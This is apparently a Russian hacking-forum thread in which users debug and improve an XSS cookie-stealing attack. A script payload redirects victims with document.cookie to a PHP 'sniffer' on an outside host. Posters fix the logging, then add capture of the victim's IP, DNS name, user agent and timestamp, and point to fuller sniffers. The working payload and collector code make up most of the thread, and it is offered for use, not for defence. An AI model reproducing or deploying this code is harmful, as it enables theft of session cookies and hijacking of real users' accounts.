Нужна помощь. Видать в запросе...

Народ, помогайте, запарился чета)
Вот вобщем, нашёл место куда сувать XSS.
Кидаю вот что:

PHP:

<script&qt; document.location.href="http://www.humora.net.ru/Files/sniff.php"+ document.cookie; </script&qt;

Где sniff.php содержит такие строки:

PHP:

<?
 $f = fopen("snif.txt", "a");
 fwrite($f, $REQUEST_URI);
 fclose($f);
 print("OK");
?&qt;

И в итоге, чтобы записать мои куки, снифером, в snif.txt, меня перебрасывает на страницу:
http://www.humora.net.ru/Files/sniff.phpASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBAIEAD
где
ASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBAIEAD - это и есть document.cookie
Подскажите че нетак, плиз, а то не знаю уже че за фигня

 

у тя он записывает тока урл. Всё дело в сниффере. Ты пишешь:
http://www.humora.net.ru/Files/sniff.php+ document.cookie
И переходит на урл+куки.

 

Просто добавь знак вопроса:
http://www.humora.net.ru/Files/sniff.php?
В снифере замени $REQUEST_URI на "$QUERY_STRING \n"

 

$_server['query_string']; лучше

 

Cпасибо Чето я и правду запарился) Щас буду пробовать

 

Хм.. Все сделал, поставил "?" теперь это выглядит так:
===
Parse error: syntax error, unexpected '?' in /var/www/user***/html/humora.net.ru/Files/sniff.php on line 6
===
тут код снифера:
===
<?
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?&qt;
===
туплю чето опять

 

аа все, уже не глючит , новый код:
===
<?php
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?>
===

 

PHP:

<?php
if($_SERVER['QUERY_STRING']){
    $f = fopen("log", "a");
    fwrite($f, $_SERVER['QUERY_STRING']."\n\n");
    fclose($f);
}
?>


 

а может вы мне поможете к этому сниферу какие нибудь фишки прикрутить
ну там чтобы он какую нибудь инфу о компе собирал, какой нето Ip-адрес, браузер или еще чего-нибудь по удобней ?

 

тебе нужно тока версия браузера, урл и ип. Ничё лишнего. Ну можешь ещё сделать, чтоб одинаковые записи удалялись В иненте полно пхп-снифферов, даже на этом сайте есть выложенный где-то... Поиском пройдись

 

можно дату, ип, днс и т.д...

PHP:

<?php
if($_SERVER['QUERY_STRING']){
$ip = getenv("REMOTE_ADDR");
$time = date("H:i:s");
$useragent = getenv("HTTP_USER_AGENT");
$dns = gethostbyaddr($ip);
$fo = fopen("log.txt", "a");
fwrite($fo, "Query: ".$_SERVER['QUERY_STRING']."  IP: ".$ip."  DNS: ".$dns."  UserAgent: ".$useragent."  Time: ".$time."\n\n");
fclose($fo);
}
?>


смотри исходники полноценныхх снифферов, например от kanick'a ....